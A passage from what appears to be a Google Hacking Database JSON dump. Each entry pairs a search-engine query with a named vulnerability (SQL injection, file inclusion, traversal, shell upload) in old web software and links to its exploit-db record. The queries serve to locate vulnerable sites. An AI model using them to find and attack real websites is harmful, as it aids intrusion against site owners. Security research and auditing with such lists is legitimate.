Vulnerability: http://www.exploit-db.com/exploits/5177", "submited": "2010-11-15", "request": "allinurl:\"com_simpleshop\"", "id": 1515}, {"short description": "powered by vBulletin 3.8.4", "long description": "vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability: http://www.exploit-db.com/exploits/14833", "submited": "2010-11-15", "request": "powered by vBulletin 3.8.4", "id": 1516}, {"short description": "intitle:Web Calendar system v 3.30 inurl:.asp", "long description": "Web Calendar System 3.12/3.30 Multiple Remote Vulnerabilities - CVE: 2004-1552: http://www.exploit-db.com/exploits/7242", "submited": "2010-11-15", "request": "intitle:Web Calendar system v 3.30 inurl:.asp", "id": 1518}, {"short description": "inurl:index.php?page=en_jobseekers", "long description": "JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability - CVE: 2007-5785: http://www.exploit-db.com/exploits/4576", "submited": "2010-11-15", "request": "inurl:index.php?page=en_jobseekers", "id": 1519}, {"short description": "webwizguestbook_license.asp", "long description": "Web Wiz Guestbook 8.21 (WWGguestbook.mdb) DD Vulnerability - CVE: 2003-1571: http://www.exploit-db.com/exploits/7488", "submited": "2010-11-15", "request": "webwizguestbook_license.asp", "id": 1521}, {"short description": "allinurl: aid \"com_xfaq\"", "long description": "Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability - CVE: 2008-0795: http://www.exploit-db.com/exploits/5109", "submited": "2010-11-15", "request": "allinurl: aid \"com_xfaq\"", "id": 1522}, {"short description": "inurl:modules/flashgames/", "long description": "XOOPS Flashgames Module 1.0.1 Remote SQL Injection Vulnerability - CVE: 2007-2543: http://www.exploit-db.com/exploits/3849", "submited": "2010-11-15", "request": "inurl:modules/flashgames/", "id": 1523}, {"short description": "inurl:index.php?option=com_mediaslide", "long description": "Joomla Component com_mediaslide Directory Traversal Vulnerability: 
http://www.exploit-db.com/exploits/10591", "submited": "2010-11-15", "request": "inurl:index.php?option=com_mediaslide", "id": 1524}, {"short description": "inurl:\"com_biblestudy\"", "long description": "Joomla Component com_biblestudy LFI Vulnerability - CVE: 2010-0157: http://www.exploit-db.com/exploits/10943", "submited": "2010-11-15", "request": "inurl:\"com_biblestudy\"", "id": 1525}, {"short description": "inurl:\"com_dashboard\"", "long description": "Joomla Component com_dashboard Directory Traversal: http://www.exploit-db.com/exploits/11086", "submited": "2010-11-15", "request": "inurl:\"com_dashboard\"", "id": 1526}, {"short description": "inurl:\"com_jcollection \"", "long description": "Joomla Component com_jcollection Directory Traversal - CVE: 2010-0944: http://www.exploit-db.com/exploits/11088", "submited": "2010-11-15", "request": "inurl:\"com_jcollection \"", "id": 1527}, {"short description": "\"Affiliate Network Pro\"", "long description": "AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability - CVE: 2008-3240: http://www.exploit-db.com/exploits/6087", "submited": "2010-11-15", "request": "\"Affiliate Network Pro\"", "id": 1529}, {"short description": "index.php?option=com_pcchess", "long description": "PrinceClan Chess Mambo Com 0.8 Remote Inclusion Vulnerability - CVE: 2006-5044: http://www.exploit-db.com/exploits/2069", "submited": "2010-11-15", "request": "index.php?option=com_pcchess", "id": 1531}, {"short description": "Powered By: Forest Blog v1.3.2", "long description": "Forest Blog 1.3.2 (blog.mdb) Remote Database Disclosure Vulnerability - CVE: 2008-5780: http://www.exploit-db.com/exploits/7466", "submited": "2010-11-15", "request": "Powered By: Forest Blog v1.3.2", "id": 1532}, {"short description": "intext:\"Powered by phpFastNews\"", "long description": "phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability - CVE: 2008-4622: http://www.exploit-db.com/exploits/6779", "submited": "2010-11-15", "request": 
"intext:\"Powered by phpFastNews\"", "id": 1533}, {"short description": "Powered by phpDatingClub", "long description": "phpDatingClub (website.php page) Local File Inclusion Vulnerability - CVE: 2008-3179: http://www.exploit-db.com/exploits/6037", "submited": "2010-11-15", "request": "Powered by phpDatingClub", "id": 1534}, {"short description": "\"Powered by: Censura\"", "long description": "Censura 1.15.04 (censura.php vendorid) SQL Injection Vulnerability - CVE: 2007-2673: http://www.exploit-db.com/exploits/3843", "submited": "2010-11-15", "request": "\"Powered by: Censura\"", "id": 1535}, {"short description": "inurl:com_clanlist", "long description": "Joomla Component (com_clanlist) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15456", "submited": "2010-11-15", "request": "inurl:com_clanlist", "id": 1536}, {"short description": "\"This script created by www.script.canavari.com\"", "long description": "Basic Forum 1.1 (edit.asp) Remote SQL Injection Vulnerability - CVE: 2006-6193: http://www.exploit-db.com/exploits/2848", "submited": "2010-11-15", "request": "\"This script created by www.script.canavari.com\"", "id": 1537}, {"short description": "inurl:classified/product_desc.php?id=", "long description": "GreenCart PHP Shopping Cart (id) Remote SQL Injection Vulnerability - CVE: 2008-3585: http://www.exploit-db.com/exploits/6189", "submited": "2010-11-15", "request": "inurl:classified/product_desc.php?id=", "id": 1538}, {"short description": "allinurl:\"members.asp?action\"", "long description": "MiniNuke 2.1 (members.asp uid) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5187", "submited": "2010-11-15", "request": "allinurl:\"members.asp?action\"", "id": 1539}, {"short description": "inurl:btg_oglas", "long description": "Joomla Component (btg_oglas) HTML & XSS Injection Vulnerability: http://www.exploit-db.com/exploits/15468", "submited": "2010-11-15", "request": "inurl:btg_oglas", "id": 1540}, {"short 
description": "Powered by lineaCMS 2006 lineaPHP Group", "long description": "lineaCMS Cross Site Scripting Vulnerability: http://www.exploit-db.com/exploits/10736", "submited": "2010-11-15", "request": "Powered by lineaCMS 2006 lineaPHP Group", "id": 1541}, {"short description": "\"Powered by Scripteen Free Image Hosting Script V 2.3\"", "long description": "Scripteen Free Image Hosting Script 2.3 Insecure Cookie Handling Vuln - CVE: 2009-4987: http://www.exploit-db.com/exploits/9256", "submited": "2010-11-15", "request": "\"Powered by Scripteen Free Image Hosting Script V 2.3\"", "id": 1542}, {"short description": "inurl:\"com_jvideodirect \"", "long description": "Joomla Component com_jvideodirect Directory Traversal - CVE: 2010-0942: http://www.exploit-db.com/exploits/11089", "submited": "2010-11-15", "request": "inurl:\"com_jvideodirect \"", "id": 1543}, {"short description": "\"Siteman Version 1.1.9\"", "long description": "Siteman 1.1.9 (cat) Remote File Disclosure Vulnerability - CVE: 2008-0452: http://www.exploit-db.com/exploits/4973", "submited": "2010-11-15", "request": "\"Siteman Version 1.1.9\"", "id": 1544}, {"short description": "\"SimpleBlog 2.3 by 8pixel.net\"", "long description": "SimpleBlog 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability - CVE: 2006-6191: http://www.exploit-db.com/exploits/2853", "submited": "2010-11-15", "request": "\"SimpleBlog 2.3 by 8pixel.net\"", "id": 1545}, {"short description": "inurl:/squirrelcart/", "long description": "Squirrelcart 2.2.0 (cart_content.php) Remote Inclusion Vulnerability - CVE: 2006-2483: http://www.exploit-db.com/exploits/1790", "submited": "2010-11-15", "request": "inurl:/squirrelcart/", "id": 1546}, {"short description": "inurl:com_markt", "long description": "Joomla Component (com_markt) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15469", "submited": "2010-11-15", "request": "inurl:com_markt", "id": 1547}, {"short description": "\"powered by EQdkp\"", "long description": 
"EQdkp 1.3.0 (dbal.php) Remote File Inclusion Vulnerability - CVE: 2006-2256: http://www.exploit-db.com/exploits/1764", "submited": "2010-11-15", "request": "\"powered by EQdkp\"", "id": 1548}, {"short description": "intitle:\"Login to Calendar\"", "long description": "ACal 2.2.6 (day.php) Remote File Inclusion Vulnerability - CVE: 2006-2261: http://www.exploit-db.com/exploits/1763", "submited": "2010-11-15", "request": "intitle:\"Login to Calendar\"", "id": 1549}, {"short description": "\"WebCalendar v1.0.4\"", "long description": "WebCalendar 1.0.4 (includedir) Remote File Inclusion Vulnerability - CVE: 2008-2836: http://www.exploit-db.com/exploits/5847", "submited": "2010-11-15", "request": "\"WebCalendar v1.0.4\"", "id": 1550}, {"short description": "inurl:\"com_bfsurvey\"", "long description": "Joomla Component com_bfsurvey LFI Vulnerability - CVE: 2010-2259: http://www.exploit-db.com/exploits/10946", "submited": "2010-11-15", "request": "inurl:\"com_bfsurvey\"", "id": 1551}, {"short description": "anyInventory, the most flexible and powerful web-based inventory system", "long description": "AnyInventory 2.0 (environment.php) Remote File Inclusion Vuln - CVE: 2007-4744: http://www.exploit-db.com/exploits/4365", "submited": "2010-11-15", "request": "anyInventory, the most flexible and powerful web-based inventory system", "id": 1552}, {"short description": "inurl:bemarket", "long description": "BBS E-Market (postscript.php p_mode) Remote File Inclusion Vulnerability - CVE: 2007-3934: http://www.exploit-db.com/exploits/4195", "submited": "2010-11-15", "request": "inurl:bemarket", "id": 1553}, {"short description": "inurl:\"com_jashowcase \"", "long description": "Joomla Component com_jashowcase Directory Traversal - CVE: 2010-0943: http://www.exploit-db.com/exploits/11090", "submited": "2010-11-15", "request": "inurl:\"com_jashowcase \"", "id": 1554}, {"short description": "Powered by React - www.react.nl", "long description": "React software [local file 
inclusion]: http://www.exploit-db.com/exploits/11943", "submited": "2010-11-15", "request": "Powered by React - www.react.nl", "id": 1555}, {"short description": "\"qjForum\"", "long description": "qjForum (member.asp) SQL Injection Vulnerability - CVE: 2006-2638: http://www.exploit-db.com/exploits/1833", "submited": "2010-11-15", "request": "\"qjForum\"", "id": 1556}, {"short description": "\"Powered by cifshanghai.com\"", "long description": "Cifshanghai (chanpin_info.php) CMS SQL Injection: http://www.exploit-db.com/exploits/10105", "submited": "2010-11-15", "request": "\"Powered by cifshanghai.com\"", "id": 1557}, {"short description": "allinurl:\"detResolucion.php?tipodoc_id=\"", "long description": "CMS Ariadna 2009 SQL Injection - OSVDB-ID: 63929: http://www.exploit-db.com/exploits/12301", "submited": "2010-11-15", "request": "allinurl:\"detResolucion.php?tipodoc_id=\"", "id": 1559}, {"short description": "\"Powered By : Yamamah Version 1.00\"", "long description": "Yamamah Photo Gallery 1.00 SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13857", "submited": "2010-11-15", "request": "\"Powered By : Yamamah Version 1.00\"", "id": 1560}, {"short description": "Powered by osCSS", "long description": "osCSS v1.2.1 Database Backups Disclosure: http://www.exploit-db.com/exploits/11612", "submited": "2010-11-15", "request": "Powered by osCSS", "id": 1561}, {"short description": "inurl:\"index.php?option=com_prime\"", "long description": "Joomla Component com_prime Directory Traversal: http://www.exploit-db.com/exploits/11177", "submited": "2010-11-15", "request": "inurl:\"index.php?option=com_prime\"", "id": 1562}, {"short description": "\"2006 by www.mani-stats-reader.de.vu\"", "long description": "Mani Stats Reader 1.2 (ipath) Remote File Include Vulnerability - CVE: 2007-1299: http://www.exploit-db.com/exploits/3398", "submited": "2010-11-15", "request": "\"2006 by www.mani-stats-reader.de.vu\"", "id": 1563}, {"short description": "\"powered by: 
WebLeague\"", "long description": "webLeague 2.2.0 (install.php) Remote Change Password: http://www.exploit-db.com/exploits/9164", "submited": "2010-11-15", "request": "\"powered by: WebLeague\"", "id": 1565}, {"short description": "\"All Rights Reserved. Powered by DieselScripts.com\"", "long description": "Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability - CVE: 2008-4150: http://www.exploit-db.com/exploits/6488", "submited": "2010-11-15", "request": "\"All Rights Reserved. Powered by DieselScripts.com\"", "id": 1567}, {"short description": "intitle:Web Calendar system v 3.40 inurl:.asp", "long description": "Web Calendar System 3.40 (XSS/SQL) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/7265", "submited": "2010-11-15", "request": "intitle:Web Calendar system v 3.40 inurl:.asp", "id": 1569}, {"short description": "inurl:index.php?option=com_noticia", "long description": "Joomla compnent com_noticia cross site scripting: http://www.exploit-db.com/exploits/10789", "submited": "2010-11-15", "request": "inurl:index.php?option=com_noticia", "id": 1570}, {"short description": "inurl:guestbook.php \"Advanced GuestBook\" \"powered by phpbb\"", "long description": "Advanced GuestBook 2.4.0 (phpBB) File Inclusion Vulnerability - CVE: 2006-2152: http://www.exploit-db.com/exploits/1723", "submited": "2010-11-15", "request": "inurl:guestbook.php \"Advanced GuestBook\" \"powered by phpbb\"", "id": 1571}, {"short description": "inurl:index.php?option=com_portfolio", "long description": "Joomla Component com_portfolio Local File Disclosure: http://www.exploit-db.com/exploits/12325", "submited": "2010-11-15", "request": "inurl:index.php?option=com_portfolio", "id": 1573}, {"short description": "allinurl:\"/ubbthreads/\"", "long description": "UBB Threads 6.4.x-6.5.2 (thispath) Remote File Inclusion Vulnerability - CVE: 2006-2568: http://www.exploit-db.com/exploits/1814", "submited": "2010-11-15", "request": "allinurl:\"/ubbthreads/\"", 
"id": 1574}, {"short description": "\"powered by zomplog\"", "long description": "Zomplog 3.8.2 (force_download.php) File Disclosure Vulnerability: http://www.exploit-db.com/exploits/5636", "submited": "2010-11-15", "request": "\"powered by zomplog\"", "id": 1575}, {"short description": "inurl:\"/cgi-bin/ourspace/\"", "long description": "Ourspace 2.0.9 (uploadmedia.cgi) Remote File Upload Vulnerability - CVE: 2007-4647: http://www.exploit-db.com/exploits/4343", "submited": "2010-11-15", "request": "inurl:\"/cgi-bin/ourspace/\"", "id": 1576}, {"short description": "inurl:index.php?option=com_joomradio", "long description": "Joomla Component com_joomradio SQL injection vulnerability - CVE: 2008-2633: http://www.exploit-db.com/exploits/12400", "submited": "2010-11-15", "request": "inurl:index.php?option=com_joomradio", "id": 1577}, {"short description": "\"Powered by xeCMS\"", "long description": "xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability - CVE: 2007-6508: http://www.exploit-db.com/exploits/4758", "submited": "2010-11-15", "request": "\"Powered by xeCMS\"", "id": 1578}, {"short description": "Power by PHP Classifieds", "long description": "Pre PHP Classifieds SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13992", "submited": "2010-11-15", "request": "Power by PHP Classifieds", "id": 1579}, {"short description": "\"powered by clipshare\"", "long description": "ClipShare 3.0.1 (tid) Remote SQL Injection Vulnerability - CVE: 2008-2793: http://www.exploit-db.com/exploits/5839", "submited": "2010-11-15", "request": "\"powered by clipshare\"", "id": 1580}, {"short description": "inurl:\"com_dailymeals\"", "long description": "Joomla Component com_dailymeals LFI Vulnerability: http://www.exploit-db.com/exploits/10928", "submited": "2010-11-15", "request": "inurl:\"com_dailymeals\"", "id": 1581}, {"short description": "inurl:\"/k12.tr/?part=\"", "long description": "Okul Otomasyon Portal 2.0 Remote SQL Injection Vulnerability - CVE: 
2007-5490: http://www.exploit-db.com/exploits/4539", "submited": "2010-11-15", "request": "inurl:\"/k12.tr/?part=\"", "id": 1582}, {"short description": "inurl:\"toplist.php\" \"powered by phpbb\"", "long description": "TopList", "submited": "2010-11-15", "request": "inurl:\"toplist.php\" \"powered by phpbb\"", "id": 1583}, {"short description": "inurl:\"com_clan\"", "long description": "Joomla Component (com_clan) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/15454", "submited": "2010-11-15", "request": "inurl:\"com_clan\"", "id": 1584}, {"short description": "\"Powered by WSN Guest\"", "long description": "WSN Guest Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/11344", "submited": "2010-11-15", "request": "\"Powered by WSN Guest\"", "id": 1585}, {"short description": "allinurl: com_paxxgallery \"userid\"", "long description": "Joomla Component paxxgallery 0.2 (iid) SQL Injection Vulnerability - CVE: 2008-0801: http://www.exploit-db.com/exploits/5117", "submited": "2010-11-15", "request": "allinurl: com_paxxgallery \"userid\"", "id": 1586}, {"short description": "inurl:\"index2.php?option=rss\" OR \"powered By Limbo CMS\"", "long description": "Limbo CMS 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability - CVE: 2006-2142: http://www.exploit-db.com/exploits/1729", "submited": "2010-11-15", "request": "inurl:\"index2.php?option=rss\" OR \"powered By Limbo CMS\"", "id": 1588}, {"short description": "\"Powered by ezContents Version 1.4.5\"", "long description": "ezContents 1.4.5 (index.php link) Remote File Disclosure Vulnerability - CVE: 2007-6368: http://www.exploit-db.com/exploits/4694", "submited": "2010-11-15", "request": "\"Powered by ezContents Version 1.4.5\"", "id": 1589}, {"short description": "powered by CMSbright websens", "long description": "CMSbright (id_rub_page) Remote SQL Injection Vulnerability - CVE: 2008-6991: http://www.exploit-db.com/exploits/6343", "submited": "2010-11-15", "request": "powered by 
CMSbright websens", "id": 1590}, {"short description": "allinurl: com_quiz\"tid\"", "long description": "Joomla Component Quiz 0.81 (tid) SQL Injection Vulnerability - CVE: 2008-0799: http://www.exploit-db.com/exploits/5119", "submited": "2010-11-15", "request": "allinurl: com_quiz\"tid\"", "id": 1591}, {"short description": "inurl:\"com_biographies\"", "long description": "Joomla Component com_biographies SQL injection Vulnerability: http://www.exploit-db.com/exploits/11226", "submited": "2010-11-15", "request": "inurl:\"com_biographies\"", "id": 1592}, {"short description": "inurl\"com_gurujibook\"", "long description": "Joomla Component com_gurujibook SQL injection Vulnerability: http://www.exploit-db.com/exploits/11225", "submited": "2010-11-15", "request": "inurl\"com_gurujibook\"", "id": 1593}, {"short description": "inurl:/system/article/alltopics.php OR inurl:/system/user/index.php", "long description": "OpenPHPNuke 2.3.3 Remote File Inclusion Vulnerability - CVE: 2006-2137: http://www.exploit-db.com/exploits/1727", "submited": "2010-11-15", "request": "inurl:/system/article/alltopics.php OR inurl:/system/user/index.php", "id": 1594}, {"short description": "Realizzato con WSC CMS by Dynamicsoft", "long description": "WSC CMS (Bypass) SQL Injection Vulnerability - CVE: 2010-0698: http://www.exploit-db.com/exploits/11507", "submited": "2010-11-15", "request": "Realizzato con WSC CMS by Dynamicsoft", "id": 1595}, {"short description": "\"Powered by Knowledge Base\"", "long description": "Knowledge Base Mod 2.0.2 (phpBB) Remote Inclusion Vulnerability - CVE: 2006-2134: http://www.exploit-db.com/exploits/1728", "submited": "2010-11-15", "request": "\"Powered by Knowledge Base\"", "id": 1596}, {"short description": "allinurl:\"com_extcalendar\"", "long description": "Joomla Component com_extcalendar Blind SQL Injection Vulnerability: http://www.exploit-db.com/exploits/14694", "submited": "2010-11-15", "request": "allinurl:\"com_extcalendar\"", "id": 1597}, 
{"short description": "intitle:\"Jax Formmailer - Administration\"", "long description": "Jax FormMailer 3.0.0 Remote File Inclusion Vulnerability - CVE: 2009-2378: http://www.exploit-db.com/exploits/9051", "submited": "2010-11-15", "request": "intitle:\"Jax Formmailer - Administration\"", "id": 1598}, {"short description": "Powered by: Linkarity", "long description": "Linkarity (link.php) Remote SQL Injection Vulnerability - CVE: 2008-4353: http://www.exploit-db.com/exploits/6455", "submited": "2010-11-15", "request": "Powered by: Linkarity", "id": 1599}, {"short description": "inurl:index.php?option=com_yanc", "long description": "Mambo com_yanc 1.4 beta (id) Remote SQL Injection Vulnerability - CVE: 2007-2792: http://www.exploit-db.com/exploits/3944", "submited": "2010-11-15", "request": "inurl:index.php?option=com_yanc", "id": 1600}, {"short description": "allinurl: \"index.php?p=gallerypic img_id\"", "long description": "Koobi Pro v6.1 gallery (img_id) - CVE: 2008-6210: http://www.exploit-db.com/exploits/10751", "submited": "2010-11-15", "request": "allinurl: \"index.php?p=gallerypic img_id\"", "id": 1602}, {"short description": "inurl:classified.php phpbazar", "long description": "phpBazar 2.1.0 Remote (Include/Auth Bypass) Vulnerabilities - CVE: 2006-2527: http://www.exploit-db.com/exploits/1804", "submited": "2010-11-15", "request": "inurl:classified.php phpbazar", "id": 1603}, {"short description": "intext:\"Powered by Firebrand Technologies\"", "long description": "CMS Firebrand Tec Local File Inclusion Vulnerability: http://www.exploit-db.com/exploits/12378", "submited": "2010-11-15", "request": "intext:\"Powered by Firebrand Technologies\"", "id": 1605}, {"short description": "\"Designed and Developed by Debliteck Ltd\"", "long description": "DB[CMS] Sql Injection Vulnerability: http://www.exploit-db.com/exploits/12654", "submited": "2010-11-15", "request": "\"Designed and Developed by Debliteck Ltd\"", "id": 1606}, {"short description": "\"Designed and 
Developed by Debliteck Ltd\"", "long description": "DB[CMS] (section.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12659", "submited": "2010-11-15", "request": "\"Designed and Developed by Debliteck Ltd\"", "id": 1608}, {"short description": "Supernews 2.6", "long description": "Supernews 2.6 (index.php noticia) Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8869", "submited": "2010-11-15", "request": "Supernews 2.6", "id": 1609}, {"short description": "\"powered by ezUserManager\"", "long description": "ezUserManager 1.6 Remote File Inclusion Vulnerability - CVE: 2006-2424: http://www.exploit-db.com/exploits/1795", "submited": "2010-11-15", "request": "\"powered by ezUserManager\"", "id": 1610}, {"short description": "Powered by: PreProjects", "long description": "Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13996", "submited": "2010-11-15", "request": "Powered by: PreProjects", "id": 1611}, {"short description": "allintitle: \"MCgallery 0.5b\"", "long description": "McGallery 0.5b (download.php) Arbitrary File Download Vulnerability - CVE: 2007-1478: http://www.exploit-db.com/exploits/3494", "submited": "2010-11-15", "request": "allintitle: \"MCgallery 0.5b\"", "id": 1612}, {"short description": "TRUC 0.11.0 :: 2006 by ASDIS :", "long description": "RUC 0.11.0 (download.php) Remote File Disclosure Vulnerability - CVE: 2008-0814: http://www.exploit-db.com/exploits/5129", "submited": "2010-11-15", "request": "TRUC 0.11.0 :: 2006 by ASDIS :", "id": 1613}, {"short description": "contact_frm.php", "long description": "Recipes Website 1.0 SQL Injection - OSVDB-ID: 64841: http://www.exploit-db.com/exploits/12703", "submited": "2010-11-15", "request": "contact_frm.php", "id": 1614}, {"short description": "Powered by Natterchat v1.12", "long description": "Natterchat 1.12 (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2008-7049: 
http://www.exploit-db.com/exploits/7175", "submited": "2010-11-15", "request": "Powered by Natterchat v1.12", "id": 1615}, {"short description": "\"Instant Free File Uploader\"", "long description": "Uploaderr 1.0 - File Hosting Script Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10241", "submited": "2010-11-15", "request": "\"Instant Free File Uploader\"", "id": 1616}, {"short description": "Powered by Webiz inurl:'wmt/webpages'", "long description": "(Webiz) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12798", "submited": "2010-11-15", "request": "Powered by Webiz inurl:'wmt/webpages", "id": 1618}, {"short description": "\"Powered by xchangeboard\"", "long description": "XchangeBoard 1.70 (boardID) Remote SQL Injection Vulnerability - CVE: 2008-3035: http://www.exploit-db.com/exploits/5991", "submited": "2010-11-15", "request": "\"Powered by xchangeboard\"", "id": 1619}, {"short description": "allinurl: com_mcquiz \"tid\"", "long description": "Joomla Component MCQuiz 0.9 Final (tid) SQL Injection Vulnerability - CVE: 2008-0800: http://www.exploit-db.com/exploits/5118", "submited": "2010-11-15", "request": "allinurl: com_mcquiz \"tid\"", "id": 1620}, {"short description": "inurl:\"com_productbook\"", "long description": "Joomla Component com_productbook SQL Injection Vulnerability - CVE: 2010-1045: http://www.exploit-db.com/exploits/11352", "submited": "2010-11-15", "request": "inurl:\"com_productbook\"", "id": 1622}, {"short description": "inurl: \"com_alphacontent\"", "long description": "Joomla Component alphacontent 2.5.8 (id) SQL Injection Vulnerability - CVE: 2008-1559: http://www.exploit-db.com/exploits/5310", "submited": "2010-11-15", "request": "inurl: \"com_alphacontent\"", "id": 1623}, {"short description": "\"Powered by: PreProjects\"", "long description": "Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability: http://www.exploit-db.com/exploits/13987", "submited": "2010-11-15", "request": "\"Powered by: 
PreProjects\"", "id": 1624}, {"short description": "\"Powered by SoftbizScripts\" inurl:store_info.php", "long description": "Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability - CVE: 2007-5122: http://www.exploit-db.com/exploits/4457", "submited": "2010-11-15", "request": "\"Powered by SoftbizScripts\" inurl:store_info.php", "id": 1625}, {"short description": "inurl:\"com_avosbillets\"", "long description": "Joomla (com_avosbillets) SQL injection Vulnerability: http://www.exploit-db.com/exploits/11223", "submited": "2010-11-15", "request": "inurl:\"com_avosbillets\"", "id": 1626}, {"short description": "\"Powered By Aardvark Topsites PHP 4.2.2\"", "long description": "Aardvark Topsites PHP 4.2.2 (path) Remote File Inclusion Vuln - CVE: 2006-7026: http://www.exploit-db.com/exploits/1730", "submited": "2010-11-15", "request": "\"Powered By Aardvark Topsites PHP 4.2.2\"", "id": 1628}, {"short description": "inurl:\"com_projectfork\"", "long description": "Joomla Component com_Projectfork 2.0.10 Local File Inclusion Vuln - CVE: 2009-2100: http://www.exploit-db.com/exploits/8946", "submited": "2010-11-15", "request": "inurl:\"com_projectfork\"", "id": 1629}, {"short description": "intext:\"Powered by PHPCityPortal.com\"", "long description": "PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability - CVE: 2009-4870: http://www.exploit-db.com/exploits/9395", "submited": "2010-11-15", "request": "intext:\"Powered by PHPCityPortal.com\"", "id": 1630}, {"short description": "intitle:\"jGallery\"", "long description": "jGallery 1.3 (index.php) Remote File Inclusion Vulnerability - CVE: 2007-2158: http://www.exploit-db.com/exploits/3760", "submited": "2010-11-15", "request": "intitle:\"jGallery\"", "id": 1631}, {"short description": "\"Powered by Download 3000\"", "long description": "Joomla Component d3000 1.0.0 Remote SQL Injection Vulnerability: http://www.exploit-db.com/exploits/5299", "submited": "2010-11-15", "request": "\"Powered by Download 
3000\"", "id": 1633}, {"short description": "intitle:\"zFeeder admin panel\"", "long description": "zFeeder 1.6 (admin.php) No Authentication Vulnerability - CVE: 2009-0807: http://www.exploit-db.com/exploits/8092", "submited": "2010-11-15", "request": "intitle:\"zFeeder admin panel\"", "id": 1634}, {"short description": "Powered by WebStudio", "long description": "WebStudio CMS (pageid) Remote Blind SQL Injection Vuln - CVE: 2008-5336: http://www.exploit-db.com/exploits/7236", "submited": "2010-11-15", "request": "Powered by WebStudio", "id": 1635}, {"short description": "inurl:\"select_file2.php\"", "long description": "Flashden Multiple File Uploader Shell Upload Vulnerability: http://www.exploit-db.com/exploits/10236", "submited": "2010-11-15", "request": "inurl:\"select_file2.php\"", "id": 1636}, {"short description": "\"powered by Gradman\"", "long description": "Gradman 0.1.3 (info.php tabla) Local File Inclusion Vulnerability - CVE: 2008-0393: http://www.exploit-db.com/exploits/4936", "submited": "2010-11-15", "request": "\"powered by Gradman\"", "id": 1638}, {"short description": "\"Designed and Developed by Debliteck Ltd\"", "long description": "DB[CMS] (article.php) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/12666", "submited": "2010-11-15", "request": "\"Designed and Developed by Debliteck Ltd\"", "id": 1639}, {"short description": "\"Powered by mlffat\"", "long description": "Mlffat 2.1 (Auth Bypass / Cookie) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8674", "submited": "2010-11-15", "request": "\"Powered by mlffat\"", "id": 1640}, {"short description": "inurl:\"/squirrelcart/\" -squirrelcart.com", "long description": "Squirrelcart 1.x.x (cart.php) Remote File Inclusion Vulnerability - CVE: 2007-4439: http://www.exploit-db.com/exploits/4295", "submited": "2010-11-15", "request": "inurl:\"/squirrelcart/\" -squirrelcart.com", "id": 1641}, {"short description": "Engine powered by easyLink V1.1.0.", "long 
description": "easyLink 1.1.0 (detail.php) Remote SQL Injection Vulnerability - CVE: 2008-6471: http://www.exploit-db.com/exploits/6494", "submited": "2010-11-15", "request": "Engine powered by easyLink V1.1.0.", "id": 1642}, {"short description": "allintext: \"This site is powered by IndexScript\"", "long description": "IndexScript 2.8 (show_cat.php cat_id) SQL Injection Vulnerability - CVE: 2007-4069: http://www.exploit-db.com/exploits/4225", "submited": "2010-11-15", "request": "allintext: \"This site is powered by IndexScript\"", "id": 1643}, {"short description": "2005 Ocean12 Technologies. All rights reserved", "long description": "Ocean12 Membership Manager Pro Database Disclosure Vulnerability: http://www.exploit-db.com/exploits/7245", "submited": "2010-11-15", "request": "2005 Ocean12 Technologies. All rights reserved", "id": 1644}, {"short description": "\"powered by PassWiki\"", "long description": "PassWiki 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability - CVE: 2008-6423: http://www.exploit-db.com/exploits/5704", "submited": "2010-11-15", "request": "\"powered by PassWiki\"", "id": 1646}, {"short description": "\"software 2004-2005 by randshop\"", "long description": "Randshop 1.1.1 (header.inc.php) Remote File Include Vulnerability - CVE: 2006-3375: http://www.exploit-db.com/exploits/1971", "submited": "2010-11-15", "request": "\"software 2004-2005 by randshop\"", "id": 1647}, {"short description": "\"powered by phpEmployment\"", "long description": "phpEmployment (php upload) Arbitrary File Upload Vulnerability - CVE: 2008-6920: http://www.exploit-db.com/exploits/7563", "submited": "2010-11-15", "request": "\"powered by phpEmployment\"", "id": 1648}, {"short description": "inurl:\"wp-download.php?dl_id=\"", "long description": "Wordpress Plugin Download (dl_id) SQL Injection Vulnerability - CVE: 2008-1646: http://www.exploit-db.com/exploits/5326", "submited": "2010-11-15", "request": "inurl:\"wp-download.php?dl_id=\"", "id": 1649}, {"short 
